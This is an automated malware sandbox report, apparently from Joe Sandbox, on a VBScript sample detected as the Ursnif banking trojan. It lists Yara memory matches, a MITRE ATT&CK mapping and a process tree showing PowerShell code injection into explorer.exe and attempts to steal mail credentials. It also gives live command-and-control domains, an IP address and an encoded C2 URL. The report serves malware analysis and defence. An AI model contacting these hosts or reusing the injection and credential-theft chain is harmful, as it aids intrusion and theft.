            Source: Yara match File source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Tries to steal Mail credentials (via file access)
            Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match File source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY

            Mitre Att&ck Matrix

            Techniques observed, grouped by tactic column of the matrix (bracketed digits are the counters attached to each technique on the original page):

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Windows Management Instrumentation [211]; Scripting [121]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [1]; PowerShell [1]; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
            Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Privilege Escalation: DLL Side-Loading [1]; Process Injection [812]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Defense Evasion: Scripting [121]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; File Deletion [1]; Rootkit [4]; Masquerading [11]; Virtualization/Sandbox Evasion [4]; Process Injection [812]; Rundll32 [1]
            Credential Access: Credential API Hooking [3]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: File and Directory Discovery [2]; System Information Discovery [26]; Query Registry [1]; Security Software Discovery [331]; Virtualization/Sandbox Evasion [4]; Process Discovery [2]; Application Window Discovery [1]; Network Service Scanning; System Network Connections Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
            Collection: Archive Collected Data [1]; Email Collection [11]; Credential API Hooking [3]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]; Proxy [1]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 321161
            Sample: 0k4Vu1eOEIhU.vbs
            Startdate: 20/11/2020
            Architecture: WINDOWS
            Score: 100

            Process tree recovered from the graph (child nodes indented under their parent; numbers after a process name are the counters shown on the original node):

            • Start
              • DNS/IP: resolver1.opendns.com
              • Signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 12 other signatures
              • mshta.exe 19 (started)
                • Signature: Suspicious powershell command line found
                • powershell.exe 32 (started)
                  • Created files: C:\Users\user\AppData\Local\...\gf33rpcq.0.cs (UTF-8); C:\Users\user\AppData\...\1b1iaete.cmdline (UTF-8)
                  • Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 3 other signatures
                  • explorer.exe (injected)
                    • DNS/IP: c56.lepini.at; api3.lepini.at
                    • Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; 5 other signatures
                    • RuntimeBroker.exe (injected)
                    • RuntimeBroker.exe (injected)
                    • cmd.exe (started)
                  • csc.exe 3 (started)
                    • Dropped file: C:\Users\user\AppData\Local\...\1b1iaete.dll (PE32)
                    • cvtres.exe (started)
                  • csc.exe (started)
                    • Dropped file: C:\Users\user\AppData\Local\...\gf33rpcq.dll (PE32)
                    • cvtres.exe (started)
                  • conhost.exe (started)
              • wscript.exe 2 8 (started)
                • Dropped files: C:\Users\user\AppData\Local\...\earmark.avchd (PE32); C:\Users\user\AppData\Local\...\Ammerman.zip (Zip)
                • Signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Deletes itself after installation; 2 other signatures
              • iexplore.exe 2 66 (started)
                • iexplore.exe 30 (started)
                • iexplore.exe 30 (started)
                • iexplore.exe 31 (started)
                  • DNS/IP: api10.laptok.at 47.241.19.44, ports 49731, 49732, 49734, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, United States
              • control.exe (started)
                • rundll32.exe (started)

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\earmark.avchd | 100% | Avira | TR/Crypt.XDR.Gen |
            C:\Users\user\AppData\Local\Temp\earmark.avchd | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\earmark.avchd | 46% | ReversingLabs | Win32.Trojan.Razy |

            Unpacked PE Files

            No Antivirus matches

            Domains

            Source | Detection | Scanner | Label | Link
            c56.lepini.at | 12% | Virustotal | | Browse
            api3.lepini.at | 11% | Virustotal | | Browse
            api10.laptok.at | 12% | Virustotal | | Browse

            URLs

            Source | Detection | Scanner | Label | Link
            (identical rows that the original page lists several times are collapsed, with the number of occurrences in parentheses)
            http://www.mercadolivre.com.br/ | 0% | URL Reputation (x4) | safe |
            http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation (x4) | safe |
            http://www.dailymail.co.uk/ | 0% | URL Reputation (x4) | safe |
            http://constitution.org/usdeclar.txtC: | 0% | Avira URL Cloud | safe |
            http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
            http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation (x3) | safe |
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (x3) | safe |
            http://%s.com | 0% | URL Reputation (x3) | safe |
            http://www.zhongyicts.com.cn | 0% | URL Reputation (x3) | safe |
            http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://it.search.dada.net/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation (x3) | safe |
            http://search.hanafos.com/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe |
            http://www.abril.com.br/favicon.ico | 0% | URL Reputation (x3) | safe |
            https://contoso.com/Icon | 0% | Avira URL Cloud | safe |
            http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 | 0% | Avira URL Cloud | safe |
            http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation (x3) | safe |
            http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe |
            http://busca.igbusca.com.br/ | 0% | URL Reputation (x3) | safe |
            http://www.carterandcone.coml | 0% | URL Reputation (x3) | safe |
            http://search.auction.co.kr/ | 0% | URL Reputation (x3) | safe |
            http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://google.pchome.com.tw/ | 0% | URL Reputation (x3) | safe |
            http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe |
            http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation (x3) | safe |
            http://www.gmarket.co.kr/ | 0% | URL Reputation (x3) | safe |
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (x3) | safe |
            http://searchresults.news.com.au/ | 0% | URL Reputation (x3) | safe |
            http://www.asharqalawsat.com/ | 0% | URL Reputation (x3) | safe |
            http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM | 0% | Avira URL Cloud | safe |
            http://search.yahoo.co.jp | 0% | URL Reputation (x3) | safe |
            http://buscador.terra.es/ | 0% | URL Reputation (x3) | safe |
            http://www.typography.netD | 0% | URL Reputation (x3) | safe |
            http://fontfabrik.com | 0% | URL Reputation (x2) | safe |

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            c56.lepini.at | 47.241.19.44 | true | true | | unknown
            resolver1.opendns.com | 208.67.222.222 | true | false | | high
            api3.lepini.at | 47.241.19.44 | true | false | | unknown
            api10.laptok.at | 47.241.19.44 | true | false | | unknown

              Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 | false | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            (where the original page repeats the same verdict several times under one URL, the number of repetitions is given in parentheses)
            http://search.chol.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.mercadolivre.com.br/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
            http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
            http://search.ebay.de/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.mtv.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.rambler.ru/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.nifty.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.dailymail.co.uk/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
            http://www3.fnac.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://buscar.ya.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.yahoo.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://constitution.org/usdeclar.txtC: | powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://https://file://USER.ID%lu.exe/upd | powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
            http://www.sogou.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.fontbureau.com/designers | explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | false | | high
            http://asp.usatoday.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://fr.search.yahoo.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://rover.ebay.com | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://in.search.yahoo.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.ebay.in/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            https://nuget.org/nuget.exe | powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | false | | high
            http://www.galapagosdesign.com/DPlease | explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://%s.com | explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | low
            http://msk.afisha.ru/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.zhongyicts.com.cn | explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000015.00000002.381486406.0000026700001000.00000004.00000001.sdmp | false | | high
            http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://search.rediff.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.ya.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://it.search.dada.net/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://search.naver.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.google.ru/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.hanafos.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmp | false | | high
            http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.abril.com.br/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://search.daum.net/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://search.naver.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://www.clarin.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://buscar.ozu.es/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://kr.search.yahoo.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.about.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://busca.igbusca.com.br/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.ask.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.priceminister.com/favicon.ico | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmp | false | | high
            http://www.cjmall.com/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.centrum.cz/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.carterandcone.coml | explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://suche.t-online.de/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.google.it/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://search.auction.co.kr/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
            http://www.ceneo.pl/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | | high
            http://www.amazon.de/ | explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmp | false | |
                                                                                            high
                                                                                            http://sads.myspace.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.asharqalawsat.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://busca.orange.es/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM{0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.typography.netDexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://fontfabrik.comexplorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
